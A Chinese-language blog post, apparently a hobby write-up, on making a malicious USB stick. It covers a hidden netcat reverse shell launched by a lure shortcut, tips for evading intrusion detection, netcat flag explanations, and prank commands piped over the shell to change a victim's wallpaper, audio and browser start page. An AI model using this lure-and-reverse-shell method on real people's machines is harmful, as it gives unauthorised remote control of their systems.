半小时速通的东西,成本0,沿用之前装机的U盘。
在成功监听目标设备后将进行以下操作:更换桌面壁纸、更换桌面文件图标、设置chiikawa毛毛力购买链接为默认网址、播放毛毛力音频。
https://hackernoon.com/how-to-make-a-malicious-usb-device-and-have-some-harmless-fun
——————————
手上没有带有Phison 2303 (2251-03)微控制器的USB 3.0闪存盘,所以没法做真正意义上的BadUSB,下文提到的大概只能算是用简单的社会工程和脚本执行反向Shell,主要是诱导用户点击快捷方式(
等盘到了才正式做BadUSB,思路是把闪存盘重新编程为一个键盘恶意的HID来执行自定义的恶意操作,用Duck Encoder创建HID有效载荷嵌入固件;然后通过DriveCom工具烧录,最终想要的效果是可以模拟键盘输入执行行预设的操作。
最近在关注近源渗透方面的东西,总算明白为什么老看到曝出来hvv直接跑线下办公区接网线被逮的,毕竟就算网络层的安全性再高,物理设备的插入也可以直接干烂系统x
——————————
示例拿的netcat,理论上来说并不是恶意软件,只是一个后端工具,但是windows defender会标记成恶意软件。netcat能在目标系统上执行一个反向shell后通过攻击机的客户端连接,因为它是直接使用的物理介质所以能够绕过大部分防护措施。
USB驱动器插入后创建一个新文件夹 毛毛力掉落的尾巴毛 ,把netcat可执行文件拖进去后创建批处理文件开始对U盘进行文件系统更改。创建文本文件,然后扩展名保存.cmd。打码部分是Ubuntu的ip地址:
(这个还是太简单了,想了两个基础的改进方案,一是因为标准的netcat不支持加密,但是可以用ncat加上TLS加密来通信,二是Netcat通过Base64编码命令传输;对面入侵检测系统能够识别netcat的情况下就尝试不同的工具来模拟netcat功能,下次试试Socat的内置功能。)
社工步骤是创建一个快捷方式图标并链接到隐藏目录中的恶意软件来诱导目标点击,简单的伪装极致的效果x把毛毛力的jpg转成了ico,效果如下:
隐藏文件夹后目标打开的视角:
运行漏洞的服务器是安装了netcat的Ubuntu,创建一个反向shell让能在Windows上执行命令。
netcat基本语法 nc [options] [hostname] [port]
- -l: 监听模式。nc 会在指定的端口上监听传入的连接。
- -p: 指定端口号(通常与 -l 选项一起使用)。
- -e: 执行指定的程序,将其输入/输出连接到 netcat 的网络连接(注意安全问题,有些实现中此选项被禁用)。
- -v: 启用详细模式,提供更多的连接信息。
- -u: 使用 UDP 协议而不是默认的 TCP。
- -z: 扫描端口而不发送任何数据(用于端口扫描)。
- -n: 禁用 DNS 查询,直接使用 IP 地址。
——————————
更换壁纸
*echo ‘powershell.exe -Command “Set-ItemProperty -Path ‘‘HKCU:Control Panel\Desktop’’ -Name WallPaper -Value ‘‘C:\path\to\mml.jpg’’; RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters”’ | nc |
播放音频
*echo ‘start “” “C:\path\to\mml.mp3”’ | nc |
设置网站
*echo ‘powershell -command “New-ItemProperty -Path ‘‘HKCU:\Software\Microsoft\Internet Explorer\Main’’ -Name ‘‘Start Page’’ -Value ‘‘https://chiikawamarket.jp/collections/momonga/products/4582662944312’’ -Force”’ | nc |